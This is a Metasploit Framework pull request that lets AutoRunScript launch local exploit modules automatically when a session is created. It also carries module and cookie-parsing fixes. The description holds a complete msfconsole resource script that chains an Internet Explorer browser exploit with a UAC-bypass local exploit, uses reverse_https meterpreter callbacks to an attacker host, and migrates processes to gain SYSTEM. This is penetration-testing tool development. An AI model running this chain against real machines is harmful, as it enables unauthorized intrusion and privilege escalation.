### PR TITLE
adds the ability to set a local exploit as target for AutoRunScript...

### DIFF
--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -84,7 +84,7 @@ module Scriptable
           original_exploit_datastore = self.exploit.datastore || {}
           copy_of_orig_exploit_datastore = original_exploit_datastore.clone
           # we don't want to inherit a couple things, like AutoRunScript's
-          to_neuter = ['AutoRunScript', 'InitialAutoRunScript', 'LPORT']
+          to_neuter = %w{AutoRunScript InitialAutoRunScript LPORT TARGET}
           to_neuter.each do |setting|
             copy_of_orig_exploit_datastore.delete(setting)
           end

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -79,7 +79,7 @@ module Scriptable
         )
       elsif mod.type == "exploit" 
         # well it must be a local, we're not currently supporting anything else
-        if mod.category == "local"
+        if mod.exploit_type == "local"
           # get a copy of the session exploit's datastore if we can
           original_exploit_datastore = self.exploit.datastore || {}
           copy_of_orig_exploit_datastore = original_exploit_datastore.clone

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -52,7 +52,8 @@ module Scriptable
   end
 
   #
-  # Executes the supplied script, Post module, or local exploit with arguments +args+
+  # Executes the supplied script, Post module, or local Exploit module with
+  #   arguments +args+
   #
   # Will search the script path.
   #
@@ -81,13 +82,16 @@ module Scriptable
         if mod.exploit_type == "local"
           # get a copy of the session exploit's datastore if we can
           original_exploit_datastore = self.exploit.datastore || {}
-          copy_of_orig_exploit_datastore = original_exploit_datastore.dup
+          copy_of_orig_exploit_datastore = original_exploit_datastore.clone
           # we don't want to inherit a couple things, like AutoRunScript's
           to_neuter = ['AutoRunScript', 'InitialAutoRunScript', 'LPORT']
-          to_neuter.each { |setting| copy_of_orig_exploit_datastore.delete(setting) }
+          to_neuter.each do |setting|
+            copy_of_orig_exploit_datastore.delete(setting)
+          end
 
-          # merge in any opts that were passed in, defaulting to the
-          # copy of the datastore (of the exploit) that spawned the session
+          # merge in any opts that were passed in, defaulting all other settings
+          # to the values from the datastore (of the exploit) that spawned the
+          # session
           local_exploit_opts = copy_of_orig_exploit_datastore.merge(opts)
 
           # try to run this local exploit, which is likely to be exception prone
@@ -102,7 +106,8 @@ module Scriptable
           rescue ::Interrupt
             raise $!
           rescue ::Exception => e
-            print_error("Local exploit exception (#{mod.refname}): #{e.class} #{e}")
+            print_error("Local exploit exception (#{mod.refname}): " +
+                        "#{e.class} #{e}")
             if(e.class.to_s != 'Msf::OptionValidateError')
               print_error("Call stack:")
               e.backtrace.each do |line|

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -86,7 +86,7 @@ module Scriptable
           copy_of_orig_exploit_datastore = original_exploit_datastore.clone
           # convert datastore opts to a hash to normalize casing issues
           local_exploit_opts = {}
-          copy_of_orig_exploit_datastore.each do |k,v| 
+          copy_of_orig_exploit_datastore.each do |k,v|
             local_exploit_opts[k.downcase] = v
           end
           # we don't want to inherit a couple things, like AutoRunScript's
@@ -98,15 +98,7 @@ module Scriptable
           # merge in any opts that were passed in, defaulting all other settings
           # to the values from the datastore (of the exploit) that spawned the
           # session
-          print_debug "local_exploit_opts"
-          print_error local_exploit_opts.inspect
-          print_error "lport:#{local_exploit_opts['lport']},LPORT:#{local_exploit_opts['LPORT']}"
-          print_error "payload:#{local_exploit_opts['payload']},PAYLOAD:#{local_exploit_opts['PAYLOAD']}"
           local_exploit_opts = local_exploit_opts.merge(opts)
-          print_error "after merge"
-          print_error local_exploit_opts.inspect
-          print_error "lport:#{local_exploit_opts['lport']},LPORT:#{local_exploit_opts['LPORT']}"
-          print_error "payload:#{local_exploit_opts['payload']},PAYLOAD:#{local_exploit_opts['PAYLOAD']}"
 
           # try to run this local exploit, which is likely to be exception prone
           begin
@@ -139,7 +131,7 @@ module Scriptable
 
       # No path found?  Weak.
       if full_path.nil?
-        print_error("The specified script could not be found: #{script_name}")
+        print_error("The specified module could not be found: #{script_name}")
         return true
       end
       framework.events.on_session_script_run(self, full_path)

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -96,7 +96,8 @@ module Scriptable
           # try to run this local exploit, which is likely to be exception prone
           begin
             new_session = mod.exploit_simple(
-              'Payload'       => local_exploit_opts['PAYLOAD'],
+              'PAYLOAD'       => local_exploit_opts['PAYLOAD'],
+              'TARGET'        => local_exploit_opts['TARGET'],
               'LocalInput'    => self.user_input,
               'LocalOutput'   => self.user_output,
               'Options'       => local_exploit_opts

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -82,7 +82,7 @@ module Scriptable
         if mod.category == "local"
           # get a copy of the session exploit's datastore if we can
           original_exploit_datastore = self.exploit.datastore || {}
-          copy_of_orig_exploit_datastore = original_exploit_datastore.dup
+          copy_of_orig_exploit_datastore = original_exploit_datastore.clone
           # we don't want to inherit a couple things, like AutoRunScript's
           to_neuter = ['AutoRunScript', 'InitialAutoRunScript']
           to_neuter.each { |setting| copy_of_orig_exploit_datastore.delete(setting) }

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -78,7 +78,7 @@ module Scriptable
         )
       elsif mod.type == "exploit"
         # well it must be a local, we're not currently supporting anything else
-        if mod.category == "local"
+        if mod.exploit_type == "local"
           # get a copy of the session exploit's datastore if we can
           original_exploit_datastore = self.exploit.datastore || {}
           copy_of_orig_exploit_datastore = original_exploit_datastore.dup

--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -131,7 +131,7 @@ module Scriptable
 
       # No path found?  Weak.
       if full_path.nil?
-        print_error("The specified module could not be found: #{script_name}")
+        print_error("The specified script could not be found: #{script_name}")
         return true
       end
       framework.events.on_session_script_run(self, full_path)

--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -282,7 +282,7 @@ class Module
   def category
     self.class.category
   end
-  alias_method :category, :catname
+  alias_method :catname, :category
 
   #
   # Returns the module's rank.

--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -41,10 +41,6 @@ class Module
       refname.split('/').last
     end
 
-    def category
-      refname.split('/')[1]
-    end
-
     #
     # Returns this module's ranking.
     #
@@ -273,16 +269,6 @@ class Module
   def refname
     self.class.refname
   end
-
-  #
-  # Returns the module's category, defined as the part of the refname after
-  # the platform
-  #
-  # "shell" when windows/shell/reverse_tcp, "local" when windows/local/bypassuac
-  def category
-    self.class.category
-  end
-  alias_method :catname, :category
 
   #
   # Returns the module's rank.

--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -41,6 +41,10 @@ class Module
       refname.split('/').last
     end
 
+    def category
+      refname.split('/')[1]
+    end
+
     #
     # Returns this module's ranking.
     #
@@ -269,6 +273,16 @@ class Module
   def refname
     self.class.refname
   end
+
+  #
+  # Returns the module's category, defined as the part of the refname after
+  # the platform
+  #
+  # "shell" when windows/shell/reverse_tcp, "local" when windows/local/bypassuac
+  def category
+    self.class.category
+  end
+  alias_method :category, :catname
 
   #
   # Returns the module's rank.

--- a/lib/rex/proto/http/response.rb
+++ b/lib/rex/proto/http/response.rb
@@ -67,7 +67,7 @@ class Response < Packet
     cookies = ""
     if (self.headers.include?('Set-Cookie'))
       set_cookies = self.headers['Set-Cookie']
-      key_vals = set_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?);/)
+      key_vals = set_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)
       key_vals.each do |k, v|
         # Dont downcase actual cookie name as may be case sensitive
         name = k.downcase

--- a/spec/lib/rex/proto/http/response_spec.rb
+++ b/spec/lib/rex/proto/http/response_spec.rb
@@ -116,6 +116,22 @@ describe Rex::Proto::Http::Response do
     HEREDOC
   end
 
+  def get_cookies_comma_separated
+    <<-HEREDOC.gsub(/^ {6}/, '')
+      HTTP/1.1 200 OK
+      Expires: Thu, 26 Oct 1978 00:00:00 GMT
+      Content-Length: 8556
+      Server: CherryPy/3.1.2
+      Date: Sun, 06 Jul 2014 20:09:28 GMT
+      Cache-Control: no-store, max-age=0, no-cache, must-revalidate
+      Content-Type: text/html;charset=utf-8
+      Set-Cookie: cval=880350187, session_id_8000=83466b1a1a7a27ce13d35f78155d40ca3a1e7a28; expires=Mon, 07 Jul 2014 20:09:28 GMT; httponly; Path=/, uid=348637C4-9B10-485A-BFA9-5E892432FCFD; expires=Fri, 05-Jul-2019 20:09:28 GMT
+
+      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+      <!--[if lt IE 7]> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:s="http://www.splunk.com/xhtml-extensions/1.0" xml:lang="en" lang="en" class="no-js lt-ie9 lt-ie8 lt-
+    HEREDOC
+  end
+
   def cookie_sanity_check(meth)
     resp = described_class.new()
     resp.parse(self.send meth)
@@ -180,6 +196,18 @@ describe Rex::Proto::Http::Response do
       expected_cookies = %w{
       wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin
       wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3
+      }
+      expected_cookies.shuffle!
+      cookies_array.should include(*expected_cookies)
+    end
+
+    it 'parses comma separated cookies' do
+      cookies_array = cookie_sanity_check(:get_cookies_comma_separated)
+      cookies_array.count.should eq(3)
+      expected_cookies = %w{
+      cval=880350187
+      session_id_8000=83466b1a1a7a27ce13d35f78155d40ca3a1e7a28
+      uid=348637C4-9B10-485A-BFA9-5E892432FCFD
       }
       expected_cookies.shuffle!
       cookies_array.should include(*expected_cookies)


### PR DESCRIPTION
... or InitialAutoRunScript

This PR gives msfconsole (and therefore the user) the ability to use AutoRunScript or InitialAutoRunScript to automatically run a local exploit upon session creation.  Users can pass settings to the 2nd (local) exploit via setg and/or as a part of the *AutoRunScript string, otherwise settings are taken from the created session's exploit module datastore.

To achieve this, the code (scriptable.rb) no longer checks only for mod.type == "post".  It now also checks for mod.type == "exploit" and if that's true it also checks that exploit_type == "local".  If so, it clones the datastore from the current session's exploit module, strips the settings for AutoRunScript, InitialAutoRunScript, and LPORT to help guard against infinite exploitation loops.  The code then merges in the settings passed to it through the *AutoRunScript string, such as when one does set AutoRunScript exploit/windows/local/bypassuac LHOST=attacker LPORT=4443.  There is nothing that prevents the user from re-assigning the original LPORT, thus forcing an infinite loop.  That was debated, and could be changed so that the original (primary) LPORT and the LPORT for the local exploit are compared and rejected if they are the same.  Same goes for the *AutoRunScript(s). 
## Verification Steps
- [x]  Fire up msfconsole, set AutoRunScript exploit/windows/local/bypassuac (e.g)
- [x]  Run an exploit that gives you a meterp session and see local exploit won't run due to explicit check for module.type == "post"
- [x]  Grab the PR code and run the resource script below, or a variant of it of your choosing.  
  Feel free to experiment w/various settings
### The following cases are confirmed to work
- Primary exploit leads to user context where user is an admin, and local exploit is used to bypassuac and become system (default state of the resource file below)
- unset'ting DisablePayloadHandler for the 2nd (local) exploit and letting console create the handler
- With PSexec as the primary exploit (tho you'll already be system)
- Using a meterp binary directly from the target to simulate the primary exploit.
- without setting LPORT for the local (2nd) exploit handler (rc_lport_for_local) in which case console does what it normally does, uses a default or global value.  LPORT is explicitly neutered by the new code in this PR so that the 2nd connect back does not initiate an infinite loop by connecting back to the original handler
- without setting LHOST for the local (2nd) exploit handler (rc_lhost_for_local) in which case console does what it normally does, uses a default or global value.  LHOST should be copied from the original exploit however
### Start of resource script

```
#
#0) setup our variables
#
<% rc_primary_lhost = "192.168.130.1" %>
<% rc_lhost_for_local = rc_primary_lhost %>

<% rc_primary_lport = "4433" %>
<% rc_lport_for_local = "4443" %>

## primary exploit options
#<% rc_primary_exploit = "exploit/windows/smb/psexec" %> #>
<% rc_primary_exploit = "exploit/windows/browser/ms14_012_textrange" %>
<% if rc_primary_exploit =~ /\/browser\// %>
  # browser exploit
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["SRVHOST", rc_primary_lhost], ["LPORT", rc_primary_lport]] %>
<% elsif rc_primary_exploit =~ /\/psexec/ %>
  # psexec exploit
  #<% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", "192.168.130.166"], ["LPORT", rc_primary_lport], ["SMBDomain", '.'], ["SMBUser", "USERNAMEHERE"], ["SMBPass", 'PASSWORDHERE']] %>
<% else %>
  # other exploit
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", "192.168.130.166"], ["LPORT", rc_primary_lport]] %>
<% end %>

<% rc_exploit_for_local = "exploit/windows/local/bypassuac_injection" %>

<% rc_primary_payload = "windows/meterpreter/reverse_https" %>
<% rc_payload_for_local = rc_primary_payload %>

<% rc_primary_initial_script = "migrate -n explorer.exe" %>
<% rc_disable_handler_for_local = "false" %>
<% rc_primary_auto_run_script = "#{rc_exploit_for_local} LPORT=#{rc_lport_for_local}" %>
<% rc_auto_run_script_for_local = "migrate -n spoolsv.exe" %>

#
#1) prep settings and set up handler for primary exploit
#
set VERBOSE true
## handler
use exploit/multi/handler
set PAYLOAD <%= rc_primary_payload %>
set LHOST <%= rc_primary_lhost %>
set LPORT <%= rc_primary_lport %>
set ExitOnSession false
set InitialAutoRunScript <%= rc_primary_initial_script %>
set AutoRunScript <%= rc_primary_auto_run_script %>
exploit -j -z

#
#2) prep for secondary exploit
#
set AutoRunScript <%= rc_auto_run_script_for_local %>
unset InitialAutoRunScript
## setup secondary handler for local exploit if DisablePayloadHandler
<% rc_primary_exploit_options.each do |opt_arr| %>
  <% if opt_arr.first.downcase == "disablepayloadhandler" && opt_arr.last.to_s.downcase == "true" %>
    <%= "set PAYLOAD %{rc_payload_for_local}" %>
    <%= "set LPORT %{rc_lport_for_local}" %>
    <%= "exploit -j -z" %>
    <% break %>
  <% end %>
<% end %>

#
#3) run primary exploit to get an initial session
#
use <%= rc_primary_exploit %>
set PAYLOAD <%= rc_primary_payload %>
<% rc_primary_exploit_options.each do |opt_arr| %>
  set <%= opt_arr.join(' ') %>
<% end %>
# also, always DisablePayloadHandler for the primary exploit (for testing at least)
set DisablePayloadHandler true
exploit -j -z

#
#4) local exploit should run automatically
#
# results vary by exploit, but in general case you might now have
#   a new meterp session running as system.
```
